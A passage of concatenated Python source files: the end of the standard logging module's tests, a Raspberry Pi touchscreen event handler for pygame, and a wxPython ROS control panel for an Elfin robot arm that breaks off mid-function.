def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
h = logging.handlers.NTEventLogHandler('test_logging')
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
support.run_unittest(
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest)
if __name__ == "__main__":
test_main()
|
tftevdev.py
|
#!/usr/bin/python
##################################################################################
# IMPORTS
##################################################################################
import evdev
import pygame
from Queue import Queue
from threading import Thread, Event
from pygame.locals import *
from tftutility import logger, Screen
# Class for handling events from piTFT
class TftTouchscreen(Thread):
def __init__(self, device_path="/dev/input/touchscreen"):
super(TftTouchscreen, self).__init__()
self.device_path = device_path
self.events = Queue()
self.shutdown = Event()
self.rotation = 0
def run(self):
thread_process = Thread(target=self.process_device)
thread_process.daemon = True
thread_process.start()
self.shutdown.wait()
def get_event(self):
if not self.events.empty():
event = self.events.get()
yield event
else:
yield None
def queue_empty(self):
return self.events.empty()
def process_device(self):
device = None
try:
device = evdev.InputDevice(self.device_path)
except Exception as ex:
message = "Unable to load device {0} due to a {1} exception with message: {2}.".format(
self.device_path, type(ex).__name__, str(ex))
logger.error(message)
raise OSError(message)
finally:
if device is None:
self.shutdown.set()
logger.debug("Loaded device {} successfully.".format(self.device_path))
event = {'time': None, 'id': None, 'x': None, 'y': None, 'touch': None}
while True:
for input_event in device.read_loop():
if input_event.type == evdev.ecodes.EV_ABS:
if input_event.code == evdev.ecodes.ABS_X:
event['x'] = input_event.value
elif input_event.code == evdev.ecodes.ABS_Y:
event['y'] = input_event.value
elif input_event.code == evdev.ecodes.ABS_MT_TRACKING_ID:
event['id'] = input_event.value
if input_event.value == -1:
event['x'] = None
event['y'] = None
event['touch'] = None
elif input_event.code == evdev.ecodes.ABS_MT_POSITION_X:
pass
elif input_event.code == evdev.ecodes.ABS_MT_POSITION_Y:
pass
elif input_event.type == evdev.ecodes.EV_KEY:
event['touch'] = input_event.value
elif input_event.type == evdev.ecodes.SYN_REPORT:
event['time'] = input_event.timestamp()
print("{}".format(event))
self.events.put(event)
e = event
event = {'x': e['x'], 'y': e['y']}
try:
event['id'] = e['id']
except KeyError:
event['id'] = None
try:
event['touch'] = e['touch']
except KeyError:
event['touch'] = None
def __del__(self):
self.shutdown.set()
class TftEvHandler(object):
pitft = TftTouchscreen(Screen.TouchscreenInput)
prev_loc = {'x': False, 'y': False}
event_state = 0
def start(self, rotation = 90):
self.pitft.rotation = rotation
self.pitft.start()
def run(self):
pass
def stop(self):
self.pitft.shutdown.set()
class TftCapacitiveEvHandler(TftEvHandler):
def run(self):
while not self.pitft.queue_empty():
for ts_event in self.pitft.get_event():
pg_event = {'y': self.prev_loc['y'], 'x': self.prev_loc['x']}
if ts_event['x'] is not None:
pg_event['y'] = ts_event['x']
if ts_event['y'] is not None:
pg_event['x'] = ts_event['y']
if pg_event['x'] is None or pg_event['y'] is None:
break
self.prev_loc = {'y': pg_event['y'], 'x': pg_event['x']}
if self.pitft.rotation == 90:
pg_event = {'x': pg_event['x'], 'y': 240 - pg_event['y']}
elif self.pitft.rotation == 270:
pg_event = {'x': 320 - pg_event['x'], 'y': pg_event['y']}
else:
raise (Exception("Unsupported display rotation"))
pg_dict = {}
pg_event_type = MOUSEBUTTONUP if ts_event['touch'] == 0 else (
MOUSEBUTTONDOWN if self.event_state == 0 else MOUSEMOTION)
if pg_event_type == MOUSEBUTTONDOWN:
self.event_state = 1
pg_dict['button'] = 1
pg_dict['pos'] = (pg_event['x'], pg_event['y'])
pygame.mouse.set_pos(pg_event['x'], pg_event['y'])
elif pg_event_type == MOUSEBUTTONUP:
self.event_state = 0
pg_dict['button'] = 1
pg_dict['pos'] = (pg_event['x'], pg_event['y'])
else:
pg_dict['buttons'] = (True, False, False)
pg_dict['rel'] = (0, 0)
pg_dict['pos'] = (pg_event['x'], pg_event['y'])
pygame.mouse.set_pos(pg_event['x'], pg_event['y'])
pe = pygame.event.Event(pg_event_type, pg_dict)
pygame.event.post(pe)
|
elfin_gui.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 28 12:18:05 2017
@author: Cong Liu
Software License Agreement (BSD License)
Copyright (c) 2017, Han's Robot Co., Ltd.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the copyright holders nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
# author: Cong Liu
from __future__ import division
import rospy
import math
import os # 20201209: add os path
import tf
import moveit_commander
from std_msgs.msg import Bool, String
from std_srvs.srv import SetBool, SetBoolRequest, SetBoolResponse
from elfin_robot_msgs.srv import SetString, SetStringRequest, SetStringResponse
from elfin_robot_msgs.srv import SetInt16, SetInt16Request
from elfin_robot_msgs.srv import *
import wx
from sensor_msgs.msg import JointState
from actionlib import SimpleActionClient
from control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal
import threading
import dynamic_reconfigure.client
class MyFrame(wx.Frame):
def __init__(self,parent,id):
the_size=(700, 700) # height from 550 change to 700
wx.Frame.__init__(self,parent,id,'Elfin Control Panel',pos=(250,100))
self.panel=wx.Panel(self)
font=self.panel.GetFont()
font.SetPixelSize((12, 24))
self.panel.SetFont(font)
self.listener = tf.TransformListener()
self.robot=moveit_commander.RobotCommander()
self.scene=moveit_commander.PlanningSceneInterface()
self.group=moveit_commander.MoveGroupCommander('elfin_arm')
self.controller_ns='elfin_arm_controller/'
self.elfin_driver_ns='elfin_ros_control/elfin/'
self.elfin_IO_ns='elfin_ros_control/elfin/io_port1/' # 20201126: add IO ns
self.call_read_do_req = ElfinIODReadRequest()
self.call_read_di_req = ElfinIODReadRequest()
self.call_read_do_req.data = True
self.call_read_di_req.data = True
self.call_read_do = rospy.ServiceProxy(self.elfin_IO_ns+'read_do',ElfinIODRead)
self.call_read_di = rospy.ServiceProxy(self.elfin_IO_ns+'read_di',ElfinIODRead)
# 20201126: add service for write_do
self.call_write_DO=rospy.ServiceProxy(self.elfin_IO_ns+'write_do',ElfinIODWrite)
self.elfin_basic_api_ns='elfin_basic_api/'
self.joint_names=rospy.get_param(self.controller_ns+'joints', [])
self.ref_link_name=self.group.get_planning_frame()
self.end_link_name=self.group.get_end_effector_link()
self.ref_link_lock=threading.Lock()
self.end_link_lock=threading.Lock()
self.DO_btn_lock = threading.Lock() # 20201208: add the threading lock
self.DI_show_lock = threading.Lock()
self.js_display=[0]*6 # joint_states
self.jm_button=[0]*6 # joints_minus
self.jp_button=[0]*6 # joints_plus
self.js_label=[0]*6 # joint_states
self.ps_display=[0]*6 # pcs_states
self.pm_button=[0]*6 # pcs_minus
self.pp_button=[0]*6 # pcs_plus
self.ps_label=[0]*6 # pcs_states
# 20201208: add the button array
self.DO_btn_display=[0]*4 # DO states
self.DI_display=[0]*4 # DI states
self.LED_display=[0]*4 # LED states
self.End_btn_display=[0]*4 # end button states
self.btn_height=370 # 20201126: from 390 change to 370
self.btn_path = os.path.dirname(os.path.realpath(__file__)) # 20201209: get the elfin_gui.py path
btn_lengths=[]
self.DO_DI_btn_length=[0,92,157,133] # 20201209: the length come from servo on, servo off, home, stop button
self.btn_interstice=22 # 20201209: come from btn_interstice
self.display_init()
self.key=[]
self.DO_btn=[0,0,0,0,0,0,0,0] # DO state, first four bits is DO, the other is LED
self.DI_show=[0,0,0,0,0,0,0,0] # DI state, first four bits is DI, the other is the end button
self.power_on_btn=wx.Button(self.panel, label=' Servo On ', name='Servo On',
pos=(20, self.btn_height))
btn_lengths.append(self.power_on_btn.GetSize()[0])
btn_total_length=btn_lengths[0]
self.power_off_btn=wx.Button(self.panel, label=' Servo Off ', name='Servo Off')
btn_lengths.append(self.power_off_btn.GetSize()[0])
btn_total_length+=btn_lengths[1]
self.reset_btn=wx.Button(self.panel, label=' Clear Fault ', name='Clear Fault')
btn_lengths.append(self.reset_btn.GetSize()[0])
btn_total_length+=btn_lengths[2]
self.home_btn=wx.Button(self.panel, label='Home', name='home_btn')
btn_lengths.append(self.home_btn.GetSize()[0])
btn_total_length+=btn_lengths[3]
self.stop_btn=wx.Button(self.panel, label='Stop', name='Stop')
btn_lengths.append(self.stop_btn.GetSize()[0])
btn_total_length+=btn_lengths[4]
self.btn_interstice=(550-btn_total_length)/4
btn_pos_tmp=btn_lengths[0]+self.btn_interstice+20 # 20201126: 20:init length + btn0 length + btn_inter:gap
self.power_off_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[1]+self.btn_interstice
self.reset_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[2]+self.btn_interstice
self.home_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[3]+self.btn_interstice
self.stop_btn.SetPosition((btn_pos_tmp, self.btn_height))
self.servo_state_label=wx.StaticText(self.panel, label='Servo state:',
pos=(590, self.btn_height-10))
self.servo_state_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', pos=(600, self.btn_height+10))
self.servo_state=bool()
self.servo_state_lock=threading.Lock()
self.fault_state_label=wx.StaticText(self.panel, label='Fault state:',
pos=(590, self.btn_height+60))
self.fault_state_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', pos=(600, self.btn_height+80))
self.fault_state=bool()
self.fault_state_lock=threading.Lock()
# 20201209: add the description of end button
self.end_button_state_label=wx.StaticText(self.panel, label='END Button state',
pos=(555,self.btn_height+172))
self.reply_show_label=wx.StaticText(self.panel, label='Result:',
pos=(20, self.btn_height+260)) # 20201126: btn_height from 120 change to 260.
self.reply_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', size=(670, 30), pos=(20, self.btn_height+280))# 20201126: btn_height from 140 change to 280.
link_textctrl_length=(btn_pos_tmp-40)/2
self.ref_links_show_label=wx.StaticText(self.panel, label='Ref. link:',
pos=(20, self.btn_height+210)) # 20201126: btn_height from 60 change to 210.
self.ref_link_show=wx.TextCtrl(self.panel, style=(wx.TE_READONLY),
value=self.ref_link_name, size=(link_textctrl_length, 30),
pos=(20, self.btn_height+230)) # 20201126: btn_height from 80 change to 230.
self.end_link_show_label=wx.StaticText(self.panel, label='End link:',
pos=(link_textctrl_length+30, self.btn_height+210))# 20201126: btn_height from 80 change to 200.
self.end_link_show=wx.TextCtrl(self.panel, style=(wx.TE_READONLY),
value=self.end_link_name, size=(link_textctrl_length, 30),
pos=(link_textctrl_length+30, self.btn_height+230))
self.set_links_btn=wx.Button(self.panel, label='Set links', name='Set links')
self.set_links_btn.SetPosition((btn_pos_tmp, self.btn_height+230)) # 20201126: btn_height from 75 change to 220.
# the variables about velocity scaling
velocity_scaling_init=rospy.get_param(self.elfin_basic_api_ns+'velocity_scaling',
default=0.4)
default_velocity_scaling=str(round(velocity_scaling_init, 2))
self.velocity_setting_label=wx.StaticText(self.panel, label='Velocity Scaling',
pos=(20, self.btn_height-55)) # 20201126: btn_height from 70 change to 55
self.velocity_setting=wx.Slider(self.panel, value=int(velocity_scaling_init*100),
minValue=1, maxValue=100,
style = wx.SL_HORIZONTAL,
size=(500, 30),
pos=(45, self.btn_height-35)) # 20201126: btn_height from 70 change to 35
self.velocity_setting_txt_lower=wx.StaticText(self.panel, label='1%',
pos=(20, self.btn_height-35)) # 20201126: btn_height from 45 change to 35
self.velocity_setting_txt_upper=wx.StaticText(self.panel, label='100%',
pos=(550, self.btn_height-35))# 20201126: btn_height from 45 change to 35
self.velocity_setting_show=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER|wx.TE_READONLY),
value=default_velocity_scaling,
pos=(600, self.btn_height-45))# 20201126: btn_height from 55 change to 45
self.velocity_setting.Bind(wx.EVT_SLIDER, self.velocity_setting_cb)
self.teleop_api_dynamic_reconfig_client=dynamic_reconfigure.client.Client(self.elfin_basic_api_ns,
config_callback=self.basic_api_reconfigure_cb)
self.dlg=wx.Dialog(self.panel, title='messag')
self.dlg.Bind(wx.EVT_CLOSE, self.closewindow)
self.dlg_panel=wx.Panel(self.dlg)
self.dlg_label=wx.StaticText(self.dlg_panel, label='hello', pos=(15, 15))
self.set_links_dlg=wx.Dialog(self.panel, title='Set links', size=(400, 100))
self.set_links_dlg_panel=wx.Panel(self.set_links_dlg)
self.sld_ref_link_show=wx.TextCtrl(self.set_links_dlg_panel, style=wx.TE_PROCESS_ENTER,
value='', pos=(20, 20), size=(link_textctrl_length, 30))
self.sld_end_link_show=wx.TextCtrl(self.set_links_dlg_panel, style=wx.TE_PROCESS_ENTER,
value='', pos=(20, 70), size=(link_textctrl_length, 30))
self.sld_set_ref_link_btn=wx.Button(self.set_links_dlg_panel, label='Update ref. link',
name='Update ref. link')
self.sld_set_ref_link_btn.SetPosition((link_textctrl_length+30, 15))
self.sld_set_end_link_btn=wx.Button(self.set_links_dlg_panel, label='Update end link',
name='Update end link')
self.sld_set_end_link_btn.SetPosition((link_textctrl_length+30, 65))
self.set_links_dlg.SetSize((link_textctrl_length+self.sld_set_ref_link_btn.GetSize()[0]+50, 120))
self.call_teleop_joint=rospy.ServiceProxy(self.elfin_basic_api_ns+'joint_teleop',
SetInt16)
self.call_teleop_joint_req=SetInt16Request()
self.call_teleop_cart=rospy.ServiceProxy(self.elfin_basic_api_ns+'cart_teleop',
SetInt16)
self.call_teleop_cart_req=SetInt16Request()
self.call_teleop_stop=rospy.ServiceProxy(self.elfin_basic_api_ns+'stop_teleop',
SetBool)
self.call_teleop_stop_req=SetBoolRequest()
self.call_stop=rospy.ServiceProxy(self.elfin_basic_api_ns+'stop_teleop',
SetBool)
self.call_stop_req=SetBoolRequest()
self.call_stop_req.data=True
self.stop_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_stop,
rq=self.call_stop_req :
self.call_set_bool_common(evt, cl, rq))
self.call_reset=rospy.ServiceProxy(self.elfin_driver_ns+'clear_fault', SetBool)
self.call_reset_req=SetBoolRequest()
self.call_reset_req.data=True
self.reset_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_reset,
rq=self.call_reset_req :
self.call_set_bool_common(evt, cl, rq))
self.call_power_on=rospy.ServiceProxy(self.elfin_basic_api_ns+'enable_robot', SetBool)
self.call_power_on_req=SetBoolRequest()
self.call_power_on_req.data=True
self.power_on_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_power_on,
rq=self.call_power_on_req :
self.call_set_bool_common(evt, cl, rq))
self.call_power_off=rospy.ServiceProxy(self.elfin_basic_api_ns+'disable_robot', SetBool)
self.call_power_off_req=SetBoolRequest()
self.call_power_off_req.data=True
self.power_off_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_power_off,
rq=self.call_power_off_req :
self.call_set_bool_common(evt, cl, rq))
self.call_move_homing=rospy.ServiceProxy(self.elfin_basic_api_ns+'home_teleop',
SetBool)
self.call_move_homing_req=SetBoolRequest()
self.call_move_homing_req.data=True
self.home_btn.Bind(wx.EVT_LEFT_DOWN,
lambda evt, cl=self.call_move_homing,
rq=self.call_move_homing_req :
self.call_set_bool_common(evt, cl, rq))
self.home_btn.Bind(wx.EVT_LEFT_UP,
lambda evt, mark=100:
self.release_button(evt, mark) )
self.call_set_ref_link=rospy.ServiceProxy(self.elfin_basic_api_ns+'set_reference_link', SetString)
self.call_set_end_link=rospy.ServiceProxy(self.elfin_basic_api_ns+'set_end_link', SetString)
self.set_links_btn.Bind(wx.EVT_BUTTON, self.show_set_links_dialog)
self.sld_set_ref_link_btn.Bind(wx.EVT_BUTTON, self.update_ref_link)
self.sld_set_end_link_btn.Bind(wx.EVT_BUTTON, self.update_end_link)
self.sld_ref_link_show.Bind(wx.EVT_TEXT_ENTER, self.update_ref_link)
self.sld_end_link_show.Bind(wx.EVT_TEXT_ENTER, self.update_end_link)
self.action_client=SimpleActionClient(self.controller_ns+'follow_joint_trajectory',
FollowJointTrajectoryAction)
self.action_goal=FollowJointTrajectoryGoal()
self.action_goal.trajectory.joint_names=self.joint_names
self.SetMinSize(the_size)
self.SetMaxSize(the_size)
def display_init(self):
js_pos=[20, 20]
js_btn_length=[70, 70, 61, 80]
js_distances=[10, 20, 10, 26]
dis_h=50
for i in xrange(len(self.js_display)):
self.jp_button[i]=wx.Button(self.panel,
label='J'+str(i+1)+' +',
pos=(js_pos[0],
js_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp=js_btn_length[0]+js_distances[0]
self.jp_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=i+1 : self.teleop_joints(evt, mark) )
self.jp_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=i+1 : self.release_button(evt, mark) )
self.jm_button[i]=wx.Button(self.panel,
label='J'+str(i+1)+' -',
pos=(js_pos[0]+dis_tmp,
js_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp+=js_btn_length[1]+js_distances[1]
self.jm_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=-1*(i+1) : self.teleop_joints(evt, mark) )
self.jm_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=-1*(i+1) : self.release_button(evt, mark) )
pos_js_label=(js_pos[0]+dis_tmp, js_pos[1]+(5-i)*dis_h)
self.js_label[i]=wx.StaticText(self.panel,
label='J'+str(i+1)+'/deg:',
pos=pos_js_label)
self.js_label[i].SetPosition((pos_js_label[0], pos_js_label[1]+abs(40-self.js_label[i].GetSize()[1])/2))
dis_tmp+=js_btn_length[2]+js_distances[2]
pos_js_display=(js_pos[0]+dis_tmp, js_pos[1]+(5-i)*dis_h)
self.js_display[i]=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER |wx.TE_READONLY),
value=' 0000.00 ',
pos=pos_js_display)
self.js_display[i].SetPosition((pos_js_display[0], pos_js_display[1]+abs(40-self.js_display[i].GetSize()[1])/2))
dis_tmp+=js_btn_length[3]+js_distances[3]
ps_pos=[js_pos[0]+dis_tmp, 20]
ps_btn_length=[70, 70, 53, 80]
ps_distances=[10, 20, 10, 20]
pcs_btn_label=['X', 'Y', 'Z', 'Rx', 'Ry', 'Rz']
pcs_label=['X', 'Y', 'Z', 'R', 'P', 'Y']
unit_label=['/mm:', '/mm:', '/mm:', '/deg:', '/deg:', '/deg:']
for i in xrange(len(self.ps_display)):
self.pp_button[i]=wx.Button(self.panel,
label=pcs_btn_label[i]+' +',
pos=(ps_pos[0],
ps_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp=ps_btn_length[0]+ps_distances[0]
self.pp_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=i+1 : self.teleop_pcs(evt, mark) )
self.pp_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=i+1 : self.release_button(evt, mark) )
self.pm_button[i]=wx.Button(self.panel,
label=pcs_btn_label[i]+' -',
pos=(ps_pos[0]+dis_tmp,
ps_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp+=ps_btn_length[1]+ps_distances[1]
self.pm_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=-1*(i+1) : self.teleop_pcs(evt, mark) )
self.pm_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=-1*(i+1) : self.release_button(evt, mark) )
pos_ps_label=(ps_pos[0]+dis_tmp, ps_pos[1]+(5-i)*dis_h)
self.ps_label[i]=wx.StaticText(self.panel,
label=pcs_label[i]+unit_label[i],
pos=pos_ps_label)
self.ps_label[i].SetPosition((pos_ps_label[0], pos_ps_label[1]+abs(40-self.ps_label[i].GetSize()[1])/2))
dis_tmp+=ps_btn_length[2]+ps_distances[2]
pos_ps_display=(ps_pos[0]+dis_tmp, ps_pos[1]+(5-i)*dis_h)
self.ps_display[i]=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER |wx.TE_READONLY),
value='',
pos=pos_ps_display)
self.ps_display[i].SetPosition((pos_ps_display[0], pos_ps_display[1]+abs(40-self.ps_display[i].GetSize()[1])/2))
dis_tmp+=ps_btn_length[3]+ps_distances[3]
# 20201209: add the DO,LED,DI,end button.
for i in xrange(len(self.DO_btn_display)):
self.DO_btn_display[i]=wx.Button(self.panel,label='DO'+str(i),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,
self.btn_height+40))
self.DO_btn_display[i].Bind(wx.EVT_BUTTON,
lambda evt,marker=i,cl=self.call_write_DO :
self.call_write_DO_command(evt,marker,cl))
self.DI_display[i]=wx.TextCtrl(self.panel, style=(wx.TE_CENTER | wx.TE_READONLY), value='DI'+str(i),
size=(self.DO_btn_display[i].GetSize()),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,self.btn_height+80))
self.LED_display[i]=wx.Button(self.panel,label='LED'+str(i),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,self.btn_height+120))
self.LED_display[i].Bind(wx.EVT_BUTTON,
lambda evt, marker=4+i, cl=self.call_write_DO :
self.call_write_DO_command(evt, marker,cl))
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i)+'_low.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap()
self.End_btn_display[i]=wx.StaticBitmap(self.panel,-1,png,
pos=(40+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,
self.btn_height+160))
def velocity_setting_cb(self, event):
current_velocity_scaling=self.velocity_setting.GetValue()*0.01
self.teleop_api_dynamic_reconfig_client.update_configuration({'velocity_scaling': current_velocity_scaling})
wx.CallAfter(self.update_velocity_scaling_show, current_velocity_scaling)
def basic_api_reconfigure_cb(self, config):
if self.velocity_setting_show.GetValue()!=config.velocity_scaling:
self.velocity_setting.SetValue(int(config.velocity_scaling*100))
wx.CallAfter(self.update_velocity_scaling_show, config.velocity_scaling)
def action_stop(self):
self.action_client.wait_for_server(timeout=rospy.Duration(secs=0.5))
self.action_goal.trajectory.header.stamp.secs=0
self.action_goal.trajectory.header.stamp.nsecs=0
self.action_goal.trajectory.points=[]
self.action_client.send_goal(self.action_goal)
def teleop_joints(self,event,mark):
self.call_teleop_joint_req.data=mark
resp=self.call_teleop_joint.call(self.call_teleop_joint_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def teleop_pcs(self,event,mark):
self.call_teleop_cart_req.data=mark
resp=self.call_teleop_cart.call(self.call_teleop_cart_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def release_button(self, event, mark):
self.call_teleop_stop_req.data=True
resp=self.call_teleop_stop.call(self.call_teleop_stop_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def call_set_bool_common(self, event, client, request):
btn=event.GetEventObject()
check_list=['Servo On', 'Servo Off', 'Clear Fault']
# Check servo state
if btn.GetName()=='Servo On':
servo_enabled=bool()
if self.servo_state_lock.acquire():
servo_enabled=self.servo_state
self.servo_state_lock.release()
if servo_enabled:
resp=SetBoolResponse()
resp.success=False
resp.message='Robot is already enabled'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
return
# Check fault state
if btn.GetName()=='Clear Fault':
fault_flag=bool()
if self.fault_state_lock.acquire():
fault_flag=self.fault_state
self.fault_state_lock.release()
if not fault_flag:
resp=SetBoolResponse()
resp.success=False
resp.message='There is no fault now'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
return
# Check if the button is in check list
if btn.GetName() in check_list:
self.show_message_dialog(btn.GetName(), client, request)
else:
try:
resp=client.call(request)
wx.CallAfter(self.update_reply_show, resp)
except rospy.ServiceException, e:
resp=SetBoolResponse()
resp.success=False
resp.message='no such service in simulation'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def thread_bg(self, msg, client, request):
wx.CallAfter(self.show_dialog)
if msg=='Servo Off':
self.action_stop()
rospy.sleep(1)
try:
resp=client.call(request)
wx.CallAfter(self.update_reply_show, resp)
except rospy.ServiceException, e:
resp=SetBoolResponse()
resp.success=False
resp.message='no such service in simulation'
wx.CallAfter(self.update_reply_show, resp)
wx.CallAfter(self.destroy_dialog)
# 20201201: add function for processing value to DO_btn
def process_DO_btn(self,value):
if self.DO_btn_lock.acquire():
for i in range(0,8):
tmp = (value >> (12 + i)) & 0x01
self.DO_btn[i]=tmp
self.DO_btn_lock.release()
# 20201201: add function to read DO.
def call_read_DO_command(self):
try:
client = self.call_read_do
val = client.call(self.call_read_do_req).digital_input
self.process_DO_btn(val)
except rospy.ServiceException, e:
resp=ElfinIODReadResponse()
resp.digital_input=0x0000
